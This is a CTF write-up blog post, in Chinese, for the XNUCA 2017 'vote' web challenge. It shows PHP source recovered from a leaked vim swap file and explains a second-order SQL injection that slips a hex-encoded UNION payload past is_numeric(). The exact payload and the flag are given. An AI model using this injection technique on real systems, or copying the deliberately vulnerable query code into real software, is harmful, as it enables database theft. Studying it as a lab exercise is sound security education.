Chybeta

XNUCA 2017-Web专题赛前指导-vote-writeup

源码泄露、二次注入

题目

1
2
3
描述:据说可以注入,然而……
http://218.76.35.75:65080/

Solution

一个简单的投票功能。初步测试后没有回显,没有报错。在CTF中,越是简单越是没有提示的,往往都有源码泄露之类的。

源码泄露/恢复

访问:

1
http://218.76.35.75:65080/.index.php.swp

下载下来,win下下下来后文件名变成了index.php.swp。用vim恢复文件。命令如下:

1
vim -r index.php

直接在vim中看可能不太方便,可以用下面的命令将其另存为:

1
w filename

得到恢复后的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
include 'db.php';
session_start();
if (!isset($_SESSION['login'])) {
$_SESSION['login'] = 'guest'.mt_rand(1e5, 1e6);
}
$login = $_SESSION['login'];
if (isset($_POST['submit'])) {
if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id']))
die('please select ...');
$id = $_POST['id'];
$vote = (int)$_POST['vote'];
if ($vote > 5 || $vote < 1)
$vote = 1;
$q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");
$q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
echo '<p><b>Thank you!</b> Results:</p>';
echo '<table border="1">';
echo '<tr><th>Logo</th><th>Total votes</th><th>Average</th></tr>';
while ($r = mysql_fetch_array($q)) {
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
echo '<tr><td>'.$arr[0].'</td>';
$arr = mysql_fetch_array(mysql_query("SELECT COUNT(value), AVG(value) FROM t_vote WHERE id = ".$r['id']));
echo '<td>'.$arr[0].'</td><td>'.round($arr[1],2).'</td></tr>';
}
echo '</table>';
echo '<br><a href="index.php">goBack</a><br>';
exit;
}
?>
<html>
<head>
<title>Movie vote</title>
</head>
<body>
<p>Welcome, Movie vote</p>
<form action="index.php" method="POST">
<table border="1" cellspacing="5">
<tr>
<?php
$q = mysql_query('SELECT * FROM t_picture');
while ($r = mysql_fetch_array($q)) {
echo '<td><img src="./images/'.$r['image'].'"><div align="center">'.$r['title'].'<br><input type="radio" name="id" value="'.$r['id'].'"></div></td>';
}
?>
</tr>
</table>
<p>Your vote:
<select name="vote">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select></p>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

二次注入

注入点在这里:

1
if (!isset($_POST['id'], $_POST['vote']) || !is_numeric($_POST['id']))

post进的参数id,经过php的函数is_numeric()检测后,insert到数据库中;

1
$q = mysql_query("INSERT INTO t_vote VALUES ({$id}, {$vote}, '{$login}')");

在完成投票后,根据id值将title取出来:

1
2
3
4
5
6
$q = mysql_query("SELECT id FROM t_vote WHERE user = '{$login}' GROUP BY id");
。。。
$r = mysql_fetch_array($q)
。。。
$arr = mysql_fetch_array(mysql_query("SELECT title FROM t_picture WHERE id = ".$r['id']));
echo '<tr><td>'.$arr[0].'</td>';

当我们传入经过十六进制转换的payload后,通过is_numeric()的检查,然后被插入到数据库中。而mysql将数据取出来时候会自动unhex一下,从而造成sql注入。

根据泄露出来的源码,我们推测表为 t_flag,字段为flag。我们要注入后的语句为:

1
SELECT title FROM t_picture WHERE id = -2 UNION SELECT GROUP_CONCAT(flag) FROM t_flag

这样因为不存在id为-2,从而能显示出flag。即payload为:

1
2
3
4
5
hex(-2 UNION SELECT GROUP_CONCAT(flag) FROM t_flag)
=>
0x2d322020554e494f4e2053454c4543542047524f55505f434f4e43415428666c6167292046524f4d20745f666c6167

flag:

1
6yvt6eYziAHgVRKz3re

微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:XNUCA 2017-Web专题赛前指导-vote-writeup

文章作者:chybeta

发布时间:2017年08月18日 - 16:08

最后更新:2017年08月18日 - 19:08

原始链接:http://chybeta.github.io/2017/08/18/XNUCA-2017-Web专题赛前指导-vote-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。